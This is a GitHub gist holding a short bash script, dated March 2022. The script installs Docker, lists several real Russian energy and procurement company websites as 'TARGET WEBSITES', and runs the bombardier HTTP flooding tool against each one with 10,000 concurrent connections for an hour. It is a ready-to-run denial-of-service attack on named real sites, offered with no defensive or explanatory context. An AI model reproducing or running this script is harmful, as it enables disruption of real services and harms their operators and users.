Skip to content

Instantly share code, notes, and snippets.

@xpr0ger
Created March 7, 2022 17:37
Show Gist options
  • Save xpr0ger/db19bb9754db258dd47254c51f90d87c to your computer and use it in GitHub Desktop.
Save xpr0ger/db19bb9754db258dd47254c51f90d87c to your computer and use it in GitHub Desktop.
#!/bin/bash
yum update -y
yum install docker -y
systemctl enable docker.service
systemctl start docker.service
# ============= TARGET WEBSITES ==============
cat <<EOF > targets.txt
transneft.ru
tektorg.ru
rosneft.com
lukoil.com
gazprom.ru
EOF
# =========== END TARGET WEBSITES ============
for target in $(cat targets.txt)
do
docker run -d --rm alpine/bombardier -c 10000 -d 1h -l $target
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment